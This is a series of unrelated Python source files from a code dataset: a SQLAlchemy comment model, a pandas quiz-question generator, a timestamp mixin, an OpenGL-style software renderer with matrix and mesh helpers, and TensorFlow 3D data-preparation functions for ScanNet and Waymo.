from sqlalchemy import Column, String
from sqlalchemy.orm import relationship
from utils.helpers import generate_uuid
from database import Base
class Comment(Base):
__tablename__ = "comments"
id = Column(
String, unique=True, primary_key=True, index=True, default=generate_uuid
)
textFr = Column(String, index=True)
textEn = Column(String, index=True)
    # default must be a callable so the timestamp is evaluated per insert, not once at import time
    publishedAt = Column(
        String, nullable=False, default=lambda: str(datetime.now().timestamp()), index=True
    )
authorId = Column(String, index=True)
targetId = Column(
String,
index=True,
)
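    # Self-referential one-to-many: `replies` collects the Comment rows whose
    # targetId points back at this comment's id.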
replies = relationship(
"Comment",
uselist=True,
foreign_keys=[targetId],
primaryjoin="Comment.id == Comment.targetId",
lazy="subquery",
)
| StarcoderdataPython |
9009 | import pandas as pd
from tqdm import tqdm
data_list = []
def get_questions(row):
global data_list
random_samples = df.sample(n=num_choices - 1)
distractors = random_samples["description"].tolist()
data = {
"question": "What is " + row["label"] + "?",
"correct": row["description"],
"distractors": distractors,
"knowledge": "{" + row["label"] + " : " + row["description"] + "}",
}
data_list.append(data)
debug = False
num_choices = 4
tqdm.pandas(desc="Progress")
df = pd.read_pickle("data/augmented_datasets/pickle/label_description.pkl")
if debug:
df = df.iloc[:10]
df = df.progress_apply(get_questions, axis=1)
new_df = pd.DataFrame(data_list)
if not debug:
new_df.to_pickle("data/augmented_datasets/pickle/description_qa_knowledge.pkl")
else:
__import__("pudb").set_trace()
| StarcoderdataPython |
4811432 | from application import db
class TimestampMixin(object):
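    # Adds UTC `created`/`modified` timestamp columns; `modified` is refreshed
    # automatically via the onupdate hook whenever the row is updated.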
created = db.Column(db.TIMESTAMP,
default=db.func.utc_timestamp())
modified = db.Column(db.TIMESTAMP,
default=db.func.utc_timestamp(),
onupdate=db.func.utc_timestamp()) | StarcoderdataPython |
3382595 | #!/usr/bin/env python3
"""
Duplicate OpenGL coordinate system...
See:
https://gamedev.stackexchange.com/questions/153078/what-can-i-do-with-the-4th-component-of-gl-position
"""
import sys
from math import sin, cos, pi, sqrt
import numpy
scalar = numpy.float64
EPSILON = 1e-6
class Mat(object):
def __init__(self, cs):
A = numpy.array(cs, dtype=scalar)
if len(A.shape)==1:
m = len(A)
A.shape = (m, 1) # col vector
assert len(A.shape)==2, A.shape
self.A = A
self.shape = A.shape
def strvec(self):
v = self.A[:, 0]
s = str(list(v))
return "Mat(%s)"%(s,)
def __str__(self):
if self.shape[1] == 1:
return self.strvec()
A = self.A
rows = [', '.join(["%.6f"%x for x in row]) for row in A]
rows = ["[%s]"%row for row in rows]
rows = "[%s]"%("\n".join(rows),)
rows = rows.replace(".000000", ". ")
return rows
__repr__ = __str__
def __eq__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
err = numpy.abs(self.A - other.A).sum()
return err < EPSILON
def __ne__(self, other):
return not self.__eq__(other)
def copy(self):
A = self.A.copy()
return Mat(A)
@classmethod
def promote(cls, item):
if isinstance(item, Mat):
return item
m = Mat(item)
return m
@classmethod
def identity(cls, n):
A = numpy.identity(n)
return cls(A)
def __add__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
A = self.A + other.A
return Mat(A)
def __sub__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
A = self.A - other.A
return Mat(A)
def __neg__(self):
A = -self.A
return Mat(A)
def __mul__(self, other):
other = Mat.promote(other)
assert self.shape[1] == other.shape[0]
A = numpy.dot(self.A, other.A)
return Mat(A)
def __rmul__(self, r):
A = r*self.A
return Mat(A)
def __getitem__(self, idx):
if type(idx) is tuple:
return self.A[idx] # <------ return
elif type(idx) is slice:
A = self.A[idx]
return Mat(A) # <----- return
if self.shape[1] == 1:
idx = (idx, 0)
return self.A[idx]
def __setitem__(self, idx, value):
if type(idx) is tuple:
pass
elif self.shape[1] == 1:
idx = (idx, 0)
self.A[idx] = value
@classmethod
def frustum(cls, left, right, bottom, top, nearval, farval):
# mesa/src/mesa/math/m_matrix.c
"""
GLfloat x, y, a, b, c, d;
GLfloat m[16];
x = (2.0F*nearval) / (right-left);
y = (2.0F*nearval) / (top-bottom);
a = (right+left) / (right-left);
b = (top+bottom) / (top-bottom);
c = -(farval+nearval) / ( farval-nearval);
d = -(2.0F*farval*nearval) / (farval-nearval); /* error? */
#define M(row,col) m[col*4+row]
M(0,0) = x; M(0,1) = 0.0F; M(0,2) = a; M(0,3) = 0.0F;
M(1,0) = 0.0F; M(1,1) = y; M(1,2) = b; M(1,3) = 0.0F;
M(2,0) = 0.0F; M(2,1) = 0.0F; M(2,2) = c; M(2,3) = d;
M(3,0) = 0.0F; M(3,1) = 0.0F; M(3,2) = -1.0F; M(3,3) = 0.0F;
#undef M
matrix_multf( mat, m, MAT_FLAG_PERSPECTIVE );
"""
pass # TODO
@classmethod
def rotate(cls, angle, x, y, z):
# angle in degrees
s = sin(angle * pi / 180.0)
c = cos(angle * pi / 180.0)
M = cls.identity(4)
r = sqrt(x*x + y*y + z*z)
if r < EPSILON:
            return M  # zero-length axis: leave the rotation as identity
x /= r
y /= r
z /= r
xx = x * x
yy = y * y
zz = z * z
xy = x * y
yz = y * z
zx = z * x
xs = x * s
ys = y * s
zs = z * s
one_c = 1.0 - c
M[0,0] = (one_c * xx) + c
M[0,1] = (one_c * xy) - zs
M[0,2] = (one_c * zx) + ys
M[0,3] = 0.0
M[1,0] = (one_c * xy) + zs
M[1,1] = (one_c * yy) + c
M[1,2] = (one_c * yz) - xs
M[1,3] = 0.0
M[2,0] = (one_c * zx) - ys
M[2,1] = (one_c * yz) + xs
M[2,2] = (one_c * zz) + c
M[2,3] = 0.0
M[3,0] = 0.0
M[3,1] = 0.0
M[3,2] = 0.0
M[3,3] = 1.0
return M
@classmethod
def translate(cls, *args):
"modelled after glTranslate"
n = len(args)+1
A = numpy.identity(n)
for i,val in enumerate(args):
A[i, n-1] = val
M = cls(A)
return M
@classmethod
def scale(cls, sx, sy, sz):
"modelled after glScale"
A = numpy.identity(4)
A[0, 0] = sx
A[1, 1] = sy
A[2, 2] = sz
M = cls(A)
return M
@classmethod
def perspective(cls, fovy, aspect, z_near, z_far):
"modelled after gluPerspective"
theta = fovy / 2 * pi / 180
delta_z = z_far - z_near
sine = sin(theta)
if (delta_z == 0) or (sine == 0) or (aspect == 0):
return
cotangent = cos(theta) / sine
A = numpy.identity(4)
A[0,0] = cotangent / aspect
A[1,1] = cotangent
A[2,2] = -(z_far + z_near) / delta_z
#A[2,3] = -1
A[3,2] = -1
#A[3,2] = -2 * z_near * z_far / delta_z
A[2,3] = -2 * z_near * z_far / delta_z
A[3,3] = 0
M = Mat(A)
return M
def norm(self):
A = self.A
r = (A*A).sum()**0.5
return r
def normalized(self):
r = self.norm()
assert r>EPSILON
A = self.A / r
return Mat(A)
def cross(self, other):
assert self.shape == (3, 1)
assert other.shape == (3, 1)
cs = [
self[1]*other[2] - self[2]*other[1],
self[2]*other[0] - self[0]*other[2],
self[0]*other[1] - self[1]*other[0]]
return Mat(cs)
def dot(self, other):
assert self.shape == (3, 1)
assert other.shape == (3, 1)
r = (self.A*other.A).sum()
return r
@classmethod
def lookat(cls, eye, center, up):
"modelled after gluLookAt"
eye = cls.promote(eye)
center = cls.promote(center)
up = cls.promote(up)
forward = center - eye
forward = forward.normalized()
side = forward.cross(up)
side = side.normalized()
up = side.cross(forward)
#M = cls.identity(4)
M = numpy.identity(4)
M[0,0] = side[0]
M[1,0] = side[1]
M[2,0] = side[2]
M[0,1] = up[0]
M[1,1] = up[1]
M[2,1] = up[2]
M[0,2] = -forward[0]
M[1,2] = -forward[1]
M[2,2] = -forward[2]
M = M.transpose()
M = Mat(M)
M1 = cls.translate(-eye[0], -eye[1], -eye[2])
M = M*M1
return M
# ----------------------------------------------------------------------
def test_perspective():
width, height = 640, 480
proj = Mat.identity(4)
M = Mat.perspective(45., width/height, 0.1, 100.)
proj = M * proj
assert proj == Mat([
[ 1.8106601, 0., 0., 0., ],
[ 0., 2.4142137, 0., 0., ],
[ 0., 0., -1.002002, -0.2002002, ],
[ 0., 0., -1., 0., ]])
test_perspective()
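# A small usage sketch (illustrative values only, not exercised by the tests):
# composing a modelview matrix the same way View.lookat/translate do below.
def _example_modelview():
    M = Mat.lookat([0., 0., 5.], [0., 0., 0.], [0., 1., 0.]) * Mat.translate(1., 0., 0.)
    return M * [1., 2., 3., 1.]  # homogeneous point mapped into camera space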
# ----------------------------------------------------------------------
from bruhat.render.base import SCALE_CM_TO_POINT
from bruhat.render.front import *
def mkpath(pts, closepath=True):
pts = [path.moveto(*pts[0])]+[path.lineto(*p) for p in pts[1:]]
if closepath:
pts.append(path.closepath())
p = path.path(*pts)
return p
class GItem(object):
def __init__(self, verts, epsilon=1e-4):
assert len(verts) >= 3
v0 = verts[0]
for v in verts[1:]:
v0 = v0 + v
center = (1./len(verts))*v0
if epsilon is not None and len(verts)>1:
# try to cover up the seams.
# does not look good with alpha blending
verts = [p + epsilon*(p-center).normalized() for p in verts]
self.verts = verts
self.center = center
def render(self, cvs):
pass
class GPoly(GItem):
def __init__(self, verts, fill=None, stroke=None, epsilon=1e-2):
GItem.__init__(self, verts, epsilon)
self.fill = fill
self.stroke = stroke
v0, v1, v2 = verts[:3]
a = v1-v0
b = v2-v0
ab = a.cross(b)
assert ab.norm() > EPSILON
self.normal = ab.normalized()
def render(self, view, cvs):
GItem.render(self, cvs)
#fill, stroke = view.illuminate(self)
fill = self.fill
stroke = self.stroke
verts = [view.trafo_canvas(v) for v in self.verts]
v = self.center
n = self.normal
if fill is not None:
fill = view.illuminate(v, n, fill)
if stroke is not None:
stroke = view.illuminate(v, n, stroke)
cvs.append(Polygon(verts, fill, stroke))
class GMesh(GItem):
def __init__(self, verts, normals, fill, epsilon=1e-2):
GItem.__init__(self, verts, epsilon)
assert len(verts) >= 3
assert len(verts) == len(normals)
v0, v1, v2 = verts[:3]
a = v1-v0
b = v2-v0
ab = a.cross(b)
normal = ab.normalized()
self.normals = normals
for n in normals:
assert normal.dot(n) > 0.
self.fill = fill
def render(self, view, cvs):
GItem.render(self, cvs)
verts = [view.trafo_canvas(v) for v in self.verts]
fill = self.fill
fills = [view.illuminate(v, n, fill)
for (v,n) in zip(self.verts, self.normals)]
cvs.append(Polymesh(verts, fills))
#class GBall(GItem):
# def __init__(self, point, radius):
# GItem.__init__(self, [point])
# self.radius = radius
#
# def render(self, cvs):
# GItem.render(self, cvs)
class Light(object):
def __init__(self, position, color):
assert position.shape == (3, 1)
self.position = position
self.color = color
class View(object):
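    # Software analogue of the fixed-function OpenGL pipeline: points pass
    # through `model` (modelview), then `proj` (projection), then the viewport
    # mapping in trafo_canvas; gitems are depth-sorted and drawn in render().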
def __init__(self, _width=640, _height=480):
#global width, height, viewport, proj, model
scale = 0.05 # XXX 1./SCALE_CM_TO_POINT
width, height = scale*_width, scale*_height
self.viewport = (0., 0., width, height)
self.proj = Mat.identity(4) # Projection matrix
self.model = Mat.identity(4) # ModelView matrix
self.stack = []
self.gitems = []
self.lights = []
def perspective(self):
#global proj
width, height = self.viewport[2:]
M = Mat.perspective(45., width/height, 0.1, 100.)
self.proj = M * self.proj
def translate(self, x, y, z): # XXX use Mat
#global model
M = Mat.translate(x, y, z)
self.model = self.model*M
def lookat(self, eye, center, up):
#global model
M = Mat.lookat(eye, center, up)
self.model = self.model*M
def rotate(self, angle, x, y, z):
M = Mat.rotate(angle, x, y, z)
self.model = self.model*M
def scale(self, sx, sy, sz):
M = Mat.scale(sx, sy, sz)
self.model = self.model*M
def save(self):
model = self.model
self.stack.append(model.copy())
def restore(self):
if not self.stack:
return
self.model = self.stack.pop()
# ------------------------------------------------
def trafo_view(self, point):
assert isinstance(point, Mat), type(point)
assert point.shape == (3, 1), repr(point)
x, y, z = point
v = [x, y, z, 1.]
v = self.model * v
assert abs(v[3]-1.) < EPSILON, "model matrix should not do this.."
v = v[:3]
return v
def trafo_view_distance(self, point):
assert isinstance(point, Mat), type(point)
assert point.shape == (3, 1), repr(point)
x, y, z = point
v = [x, y, z, 0.]
v = self.model * v
v = v[:3]
return v
def trafo_camera(self, point):
assert point.shape == (3, 1)
x, y, z = point
v = self.proj * [x, y, z, 1.]
x, y, z, w = v
#return x/w, y/w, z/w
return x, y, z
def trafo_canvas(self, point):
x, y, z = point
v = self.proj * [x, y, z, 1.]
x, y, z, w = v
x, y = x/w, y/w
x0, y0, width, height = self.viewport
w2, h2 = width/2, height/2
x = x0 + w2 + x*w2
y = y0 + h2 + y*h2
return x, y
def get_depth(self, gitem):
v = gitem.center
x, y, z = self.trafo_camera(v)
return -z
# -----------------------------------------
# class Scene ?
def add_gitem(self, face):
self.gitems.append(face)
def add_poly(self, verts, *args, **kw):
verts = [self.trafo_view(v) for v in verts]
gitem = GPoly(verts, *args, **kw)
self.add_gitem(gitem)
def add_mesh(self, verts, normals, *args, **kw):
verts = [self.trafo_view(v) for v in verts]
normals = [self.trafo_view_distance(n) for n in normals]
gitem = GMesh(verts, normals, *args, **kw)
self.add_gitem(gitem)
def add_ball(self, point, radius, *args, **kw):
point = self.trafo_view(point)
gitem = Ball(point, radius, *args, **kw)
self.add_gitem(gitem)
def add_light(self, position, color):
position = Mat.promote(position)
position = self.trafo_view(position)
light = Light(position, color)
self.lights.append(light)
def prepare_canvas(self, bg=color.rgb.black, clip=True):
cvs = canvas.canvas()
cvs.append(style.linewidth.THick)
x0, y0, width, height = self.viewport
p = mkpath([(x0, y0), (x0+width, y0), (x0+width, y0+height), (x0, y0+height)])
cvs.fill(p, [bg])
if clip:
cvs.clip(p)
cvs.append(style.linejoin.bevel)
return cvs
# def XXXilluminate(self, gitem):
# light = self.lights[0]
# v = (light.position - gitem.center).normalized()
# #v = Mat([0., 0., 1.]).normalized()
# x = v.dot(gitem.normal)
# #print(x)
# assert x <= 1+EPSILON, x
# x = max(0.3, x)
# fill = gitem.fill
# stroke = gitem.stroke
# if fill is not None:
# r, g, b, a = fill
# fill = (x*r, x*g, x*b, a)
# if stroke is not None:
# r, g, b, a = stroke
# stroke = (x*r, x*g, x*b, a)
# return fill, stroke
def illuminate(self, vert, normal, color):
light = self.lights[0]
v = (light.position - vert).normalized()
x = v.dot(normal)
assert x <= 1+EPSILON, x
x = max(0.3, x) # XXX diffuse
r, g, b, a = color
color = (x*r, x*g, x*b, a)
return color
def render(self, *args, **kw):
cvs = self.prepare_canvas(*args, **kw)
gitems = list(self.gitems)
# XXX sorting by depth does not always work...
# XXX try subdividing your GItem's ?
gitems.sort(key = self.get_depth)
for gitem in gitems:
gitem.render(self, cvs)
return cvs
# ----------------------------------------------------------------------
def make_sphere(view, radius, slices=8, stacks=8, fill=color.rgb.white):
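    # Quad-patch sphere: `stacks` latitude bands (phi runs pole to pole, starting
    # at z=-radius) times `slices` longitude wedges (theta); the first and last
    # bands are collapsed to triangles at the poles.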
z = -radius
dz = 2*radius / stacks
dtheta = 2*pi/slices
dphi = pi/stacks
for i in range(stacks):
phi0 = dphi*i
phi1 = dphi*(i+1)
r0 = radius*sin(phi0)
r1 = radius*sin(phi1)
z0 = -radius*cos(phi0)
z1 = -radius*cos(phi1)
for j in range(slices):
theta0 = j * dtheta
theta1 = (j+1) * dtheta
x0, y0 = r0*cos(theta0), r0*sin(theta0)
x1, y1 = r1*cos(theta0), r1*sin(theta0)
x2, y2 = r1*cos(theta1), r1*sin(theta1)
x3, y3 = r0*cos(theta1), r0*sin(theta1)
verts = [
Mat([x3, y3, z0]),
Mat([x2, y2, z1]),
Mat([x1, y1, z1]),
Mat([x0, y0, z0]),
]
if i==0:
verts.pop(0)
elif i==stacks-1:
verts.pop(1)
normals = [v.normalized() for v in verts]
view.add_mesh(verts, normals, fill)
def make_cylinder(view, radius0, radius1, height, slices=8, fill=color.rgb.white):
assert radius0 > EPSILON
assert radius1 > EPSILON
assert height > EPSILON
dtheta = 2*pi/slices
r0 = radius0
r1 = radius1
z = Mat([0, 0, height])
for j in range(slices):
theta0 = j * dtheta
theta1 = (j+1) * dtheta
v0 = Mat([cos(theta0), sin(theta0), 0.])
v1 = Mat([cos(theta1), sin(theta1), 0.])
dv0 = Mat([-sin(theta0), cos(theta0), 0.])
dv1 = Mat([-sin(theta1), cos(theta1), 0.])
verts = [r0*v1, r1*v1 + z, r1*v0 + z, r0*v0]
n0 = dv1.cross(verts[1]-verts[0]).normalized()
n1 = n0
n2 = dv0.cross(verts[2]-verts[3]).normalized()
n3 = n2
normals = [n0, n1, n2, n3]
view.add_mesh(verts, normals, fill)
def make_cone(view, radius, height, slices=8, fill=color.rgb.white):
assert radius > EPSILON
assert height > EPSILON
dtheta = 2*pi/slices
r = radius
z = Mat([0, 0, height])
for j in range(slices):
theta0 = j * dtheta
theta1 = (j+1) * dtheta
v0 = Mat([cos(theta0), sin(theta0), 0.])
v1 = Mat([cos(theta1), sin(theta1), 0.])
dv0 = Mat([-sin(theta0), cos(theta0), 0.])
dv1 = Mat([-sin(theta1), cos(theta1), 0.])
verts = [r*v1, z, r*v0]
n0 = dv1.cross(verts[1]-verts[0]).normalized()
n2 = dv0.cross(verts[1]-verts[2]).normalized()
n1 = (0.5*(n0+n2)).normalized()
normals = [n0, n1, n2]
view.add_mesh(verts, normals, fill)
def make_torus(view, inner, outer, slices=16, stacks=16, fill=color.rgb.white):
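    # Torus parametrised by (phi, theta): `outer` is the distance from the torus
    # centre to the tube centre, `inner` is the tube radius; normals point out
    # of the tube surface.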
dphi = 2*pi/stacks
dtheta = 2*pi/slices
for i in range(stacks):
phi0 = dphi*i
phi1 = dphi*(i+1)
u0 = Mat([cos(phi0), sin(phi0), 0.])
v0 = Mat([0., 0., 1.])
u1 = Mat([cos(phi1), sin(phi1), 0.])
v1 = Mat([0., 0., 1.])
for j in range(slices):
theta0 = dtheta*j
theta1 = dtheta*(j+1)
n0 = sin(theta0)*u0 + cos(theta0)*v0
n1 = sin(theta0)*u1 + cos(theta0)*v1
n2 = sin(theta1)*u1 + cos(theta1)*v1
n3 = sin(theta1)*u0 + cos(theta1)*v0
x0 = outer*u0 + inner*n0
x1 = outer*u1 + inner*n1
x2 = outer*u1 + inner*n2
x3 = outer*u0 + inner*n3
verts = [x3, x2, x1, x0]
normals = [n3, n2, n1, n0]
view.add_mesh(verts, normals, fill)
# ----------------------------------------------------------------------
def main():
global cvs
from bruhat import platonic
polytopes = [
platonic.make_tetrahedron(),
platonic.make_cube(),
platonic.make_octahedron(),
platonic.make_dodecahedron(),
platonic.make_icosahedron()]
polytopes = [
[[Mat(list(v)) for v in face] for face in polygon]
for polygon in polytopes]
from bruhat.argv import argv
frames = argv.get("frames", 1)
R = 6.0
y = 2.
theta = 0.
for frame in range(frames):
view = View()
view.perspective()
theta += 0.004*pi
x, z = R*sin(theta), R*cos(theta)
#R -= 0.01
#y += 0.01
view.lookat([x, y, z], [0., 0, 0], [0, 1, 0]) # eye, center, up
#view.lookat([x, 0., z], [0., 0, 0], [0, 1, 0]) # eye, center, up
point = [x, y, z]
view.add_light(point, (1., 1., 1., 1.))
#stroke = (0.4, 0.4, 0.4, 1.)
stroke = None
fills = [
(0.9, 0.8, 0., 1.0),
(0.9, 0.8, 0., 0.8),
(0.6, 0.2, 0.4, 0.8),
(0.2, 0.2, 0.4, 0.8),
(0.8, 0.6, 0.4, 0.8),
(0.0, 0.6, 0.4, 0.8),
]
if 1:
#view.rotate(frame, 1, 0, 0)
#view.rotate(0.1*frame, 0, 1, 0)
fill = fills[0]
#make_torus(view, 0.5, 2., 32, 32, fill)
#view.scale(2, 1, 1)
#make_sphere(view, 1., 16, 12, fill)
view.translate(0, -1, 0)
view.rotate(-90, 1, 0, 0)
#make_cylinder(view, 0.5, 1.0, 2., 16, fill)
make_cone(view, 0.5, 1., 16, fill)
elif 1:
view.translate(-4., 0, 2)
for idx, polygon in enumerate(polytopes):
fill = fills[idx]
view.save()
view.rotate(-frame*(idx+1), 1, 1, 0)
for verts in polygon:
view.add_poly(verts, fill, stroke)
view.restore()
view.translate(+5, 0, 0)
view.rotate(360./5, 0, 1, 0)
bg = color.rgb(0.2, 0.2, 0.2, 1.0)
cvs = view.render(bg=bg)
cvs.writePNGfile("frames/%.4d.png"%frame)
if frame == 0:
cvs.writePDFfile("frames/%.4d.pdf"%frame)
print(".", end="", flush=True)
print("OK")
if __name__ == "__main__":
main()
| StarcoderdataPython |
146911 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for preparing data to be compatible with object detection pipeline.
Functions to prepare Waymo, scannet and kitti datasets.
"""
import enum
import gin
import gin.tf
import tensorflow as tf
import tensorflow_datasets as tfds
from tf3d import standard_fields
# TODO(alirezafathi): Remove internal mark when dataset files are moved to tf3d.
from tf3d.datasets.specs import waymo_frames
from tf3d.utils import projections
class ObjectDifficulty(enum.IntEnum):
SUPER_HARD = 0
HARD = 1
MODERATE = 2
EASY = 3
def _random_string_generator(num_numbers=5, max_number_value=100000):
string_tensors = []
for _ in range(num_numbers):
random_number = tf.random.uniform([],
minval=0,
maxval=max_number_value,
dtype=tf.int32)
string_tensors.append(tf.strings.as_string(random_number))
return tf.strings.join(string_tensors)
@gin.configurable
def prepare_scannet_scene_dataset(inputs, valid_object_classes=None):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
valid_object_classes: List of valid object classes. if None, it is ignored.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
if 'mesh/vertices/positions' in inputs:
prepared_inputs[standard_fields.InputDataFields
.point_positions] = inputs['mesh/vertices/positions']
if 'mesh/vertices/normals' in inputs:
prepared_inputs[standard_fields.InputDataFields
.point_normals] = inputs['mesh/vertices/normals']
prepared_inputs[standard_fields.InputDataFields.point_normals] = tf.where(
tf.math.is_nan(
prepared_inputs[standard_fields.InputDataFields.point_normals]),
tf.zeros_like(
prepared_inputs[standard_fields.InputDataFields.point_normals]),
prepared_inputs[standard_fields.InputDataFields.point_normals])
if 'mesh/vertices/colors' in inputs:
prepared_inputs[standard_fields.InputDataFields
.point_colors] = inputs['mesh/vertices/colors'][:, 0:3]
prepared_inputs[standard_fields.InputDataFields.point_colors] = tf.cast(
prepared_inputs[standard_fields.InputDataFields.point_colors],
dtype=tf.float32)
prepared_inputs[standard_fields.InputDataFields.point_colors] *= (2.0 /
255.0)
prepared_inputs[standard_fields.InputDataFields.point_colors] -= 1.0
if 'scene_name' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_image_name] = inputs['scene_name']
if 'mesh/vertices/semantic_labels' in inputs:
prepared_inputs[
standard_fields.InputDataFields
.object_class_points] = inputs['mesh/vertices/semantic_labels']
if 'mesh/vertices/instance_labels' in inputs:
prepared_inputs[
standard_fields.InputDataFields.object_instance_id_points] = tf.reshape(
inputs['mesh/vertices/instance_labels'], [-1])
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
object_class))
valid_objects_mask = tf.cast(
valid_objects_mask,
dtype=prepared_inputs[
standard_fields.InputDataFields.object_class_points].dtype)
prepared_inputs[standard_fields.InputDataFields
.object_class_points] *= valid_objects_mask
return prepared_inputs
@gin.configurable
def prepare_scannet_frame_dataset(inputs,
min_pixel_depth=0.3,
max_pixel_depth=6.0,
valid_object_classes=None):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
min_pixel_depth: Pixels with depth values less than this are pruned.
max_pixel_depth: Pixels with depth values more than this are pruned.
valid_object_classes: List of valid object classes. if None, it is ignored.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
if 'cameras/rgbd_camera/intrinsics/K' not in inputs:
raise ValueError('Intrinsic matrix is missing.')
if 'cameras/rgbd_camera/extrinsics/R' not in inputs:
raise ValueError('Extrinsic rotation matrix is missing.')
if 'cameras/rgbd_camera/extrinsics/t' not in inputs:
raise ValueError('Extrinsics translation is missing.')
if 'cameras/rgbd_camera/depth_image' not in inputs:
raise ValueError('Depth image is missing.')
if 'cameras/rgbd_camera/color_image' not in inputs:
raise ValueError('Color image is missing.')
if 'frame_name' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_image_name] = inputs['frame_name']
camera_intrinsics = inputs['cameras/rgbd_camera/intrinsics/K']
depth_image = inputs['cameras/rgbd_camera/depth_image']
image_height = tf.shape(depth_image)[0]
image_width = tf.shape(depth_image)[1]
x, y = tf.meshgrid(
tf.range(image_width), tf.range(image_height), indexing='xy')
x = tf.reshape(tf.cast(x, dtype=tf.float32) + 0.5, [-1, 1])
y = tf.reshape(tf.cast(y, dtype=tf.float32) + 0.5, [-1, 1])
point_positions = projections.image_frame_to_camera_frame(
image_frame=tf.concat([x, y], axis=1),
camera_intrinsics=camera_intrinsics)
rotate_world_to_camera = inputs['cameras/rgbd_camera/extrinsics/R']
translate_world_to_camera = inputs['cameras/rgbd_camera/extrinsics/t']
point_positions = projections.to_world_frame(
camera_frame_points=point_positions,
rotate_world_to_camera=rotate_world_to_camera,
translate_world_to_camera=translate_world_to_camera)
prepared_inputs[standard_fields.InputDataFields
.point_positions] = point_positions * tf.reshape(
depth_image, [-1, 1])
depth_values = tf.reshape(depth_image, [-1])
valid_depth_mask = tf.logical_and(
tf.greater_equal(depth_values, min_pixel_depth),
tf.less_equal(depth_values, max_pixel_depth))
prepared_inputs[standard_fields.InputDataFields.point_colors] = tf.reshape(
tf.cast(inputs['cameras/rgbd_camera/color_image'], dtype=tf.float32),
[-1, 3])
prepared_inputs[standard_fields.InputDataFields.point_colors] *= (2.0 / 255.0)
prepared_inputs[standard_fields.InputDataFields.point_colors] -= 1.0
prepared_inputs[
standard_fields.InputDataFields.point_positions] = tf.boolean_mask(
prepared_inputs[standard_fields.InputDataFields.point_positions],
valid_depth_mask)
prepared_inputs[
standard_fields.InputDataFields.point_colors] = tf.boolean_mask(
prepared_inputs[standard_fields.InputDataFields.point_colors],
valid_depth_mask)
if 'cameras/rgbd_camera/semantic_image' in inputs:
prepared_inputs[
standard_fields.InputDataFields.object_class_points] = tf.cast(
tf.reshape(inputs['cameras/rgbd_camera/semantic_image'], [-1, 1]),
dtype=tf.int32)
prepared_inputs[
standard_fields.InputDataFields.object_class_points] = tf.boolean_mask(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
valid_depth_mask)
if 'cameras/rgbd_camera/instance_image' in inputs:
prepared_inputs[
standard_fields.InputDataFields.object_instance_id_points] = tf.cast(
tf.reshape(inputs['cameras/rgbd_camera/instance_image'], [-1]),
dtype=tf.int32)
prepared_inputs[standard_fields.InputDataFields
.object_instance_id_points] = tf.boolean_mask(
prepared_inputs[standard_fields.InputDataFields
.object_instance_id_points],
valid_depth_mask)
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
object_class))
valid_objects_mask = tf.cast(
valid_objects_mask,
dtype=prepared_inputs[
standard_fields.InputDataFields.object_class_points].dtype)
prepared_inputs[standard_fields.InputDataFields
.object_class_points] *= valid_objects_mask
return prepared_inputs
@gin.configurable
def prepare_waymo_open_dataset(inputs,
valid_object_classes=None,
max_object_distance_from_source=74.88):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
valid_object_classes: List of valid object classes. if None, it is ignored.
max_object_distance_from_source: Maximum distance of objects from source. It
will be ignored if None.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
if standard_fields.InputDataFields.point_positions in inputs:
prepared_inputs[standard_fields.InputDataFields.point_positions] = inputs[
standard_fields.InputDataFields.point_positions]
if standard_fields.InputDataFields.point_intensities in inputs:
prepared_inputs[standard_fields.InputDataFields.point_intensities] = inputs[
standard_fields.InputDataFields.point_intensities]
if standard_fields.InputDataFields.point_elongations in inputs:
prepared_inputs[standard_fields.InputDataFields.point_elongations] = inputs[
standard_fields.InputDataFields.point_elongations]
if standard_fields.InputDataFields.point_normals in inputs:
prepared_inputs[standard_fields.InputDataFields.point_normals] = inputs[
standard_fields.InputDataFields.point_normals]
if 'cameras/front/intrinsics/K' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_intrinsics] = inputs['cameras/front/intrinsics/K']
if 'cameras/front/extrinsics/R' in inputs:
prepared_inputs[
standard_fields.InputDataFields
.camera_rotation_matrix] = inputs['cameras/front/extrinsics/R']
if 'cameras/front/extrinsics/t' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_translation] = inputs['cameras/front/extrinsics/t']
if 'cameras/front/image' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_image] = inputs['cameras/front/image']
prepared_inputs[standard_fields.InputDataFields
.camera_raw_image] = inputs['cameras/front/image']
prepared_inputs[standard_fields.InputDataFields
.camera_original_image] = inputs['cameras/front/image']
if 'scene_name' in inputs and 'frame_name' in inputs:
prepared_inputs[
standard_fields.InputDataFields.camera_image_name] = tf.strings.join(
[inputs['scene_name'], inputs['frame_name']], separator='_')
if 'objects/pose/R' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_rotation_matrix] = inputs['objects/pose/R']
